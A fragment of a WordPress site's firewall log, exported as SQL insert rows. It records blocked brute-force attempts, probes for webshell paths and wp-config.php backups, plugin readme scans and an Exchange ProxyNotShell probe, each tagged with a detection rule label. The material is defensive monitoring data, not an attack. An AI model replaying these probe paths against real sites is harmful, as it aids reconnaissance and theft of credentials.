User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134701,1700180098.695793,1700180098.687000,0x00000000000000000000FFFFB9D84602,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134702,1700180090.141722,1700180090.132800,0x00000000000000000000FFFFB9D84602,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/images/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134703,0.000000,1700180559.500151,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=48448fcace','https://eckankar-colorado.org/wp-admin/profile.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(134704,0.000000,1700180594.284146,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134705,0.000000,1700181287.402399,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134706,0.000000,1700181974.573994,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134707,0.000000,1700182655.910315,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134708,0.000000,1700183336.164829,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134709,0.000000,1700184032.391629,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134710,0.000000,1700184725.485392,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134711,0.000000,1700185416.577145,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134712,0.000000,1700186110.347930,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134713,1700187303.926180,1700187303.910400,0x00000000000000000000FFFFC2A9AF5C,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134714,1700191118.808167,1700191118.800400,0x00000000000000000000FFFF12AA2EB0,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php',NULL,'curl/7.61.1','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHA=\",\"path\":\"L3dwLWNvbmZpZy5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134715,1700192211.074418,1700192211.065600,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134748,1700236896.360876,1700236896.339000,0x00000000000000000000FFFF9F59E0F7,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml','http://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134716,1700192205.388628,1700192205.366800,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134746,1700234515.185864,1700234515.178200,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134717,1700192191.091499,1700192191.066100,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133083,0.000000,1699795224.495461,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(133082,0.000000,1699791327.045818,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(133078,1699788223.603206,1699788223.599600,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.orig',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAub3JpZw==\",\"path\":\"L3dwLWNvbmZpZy5waHAub3JpZw==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134662,1700168111.265183,1700168111.250100,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133268,1699888668.605679,1699888668.597000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.mp3.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio.mp3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8ubXAzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133101,0.000000,1699816794.444755,0x00000000000000000000FFFF056850F0,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133102,0.000000,1699816796.934637,0x00000000000000000000FFFF056850F0,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133103,1699817011.643136,1699817011.631800,0x00000000000000000000FFFFC0F1C422,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(133104,1699825270.593738,1699825270.546900,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/options.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL29wdGlvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133100,1699815339.028623,1699815339.003900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-content/plugins/core-plugin/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXBsdWdpbi9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134256,1699996166.119061,1699996166.105600,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134257,1699998216.263504,1699998216.242100,0x00000000000000000000FFFF5B5CFC8E,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133280,1699888663.338632,1699888663.330000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/languages/','http://eckankar-colorado.org/wp-content/languages/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbGFuZ3VhZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134799,0.000000,1700283338.061380,0x00000000000000000000FFFF334D4254,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134800,1700284254.607249,1700284254.593700,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134780,1700247605.703437,1700247605.691900,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/images/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134767,1700247397.710985,1700247397.689100,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/certificates/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NlcnRpZmljYXRlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134756,1700242951.849515,1700242951.841800,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/mstore-api/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134750,1700237298.700648,1700237298.693200,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ht-mega-for-elementor/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134752,1700240087.132314,1700240087.124500,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-post-author/readme.txt',NULL,'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134751,0.000000,1700237735.972490,0x00000000000000000000FFFF699CE90C,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://impreunapentrubuzoieni.ro/wp-login.php','Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12','loginFailInvalidUsername',NULL,NULL),(134753,1700240087.132055,1700240087.124500,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-post-author/readme.txt',NULL,'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134755,1700242951.849761,1700242951.841800,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/mstore-api/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134754,0.000000,1700240121.663305,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(134747,1700234992.061030,1700234992.051800,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; 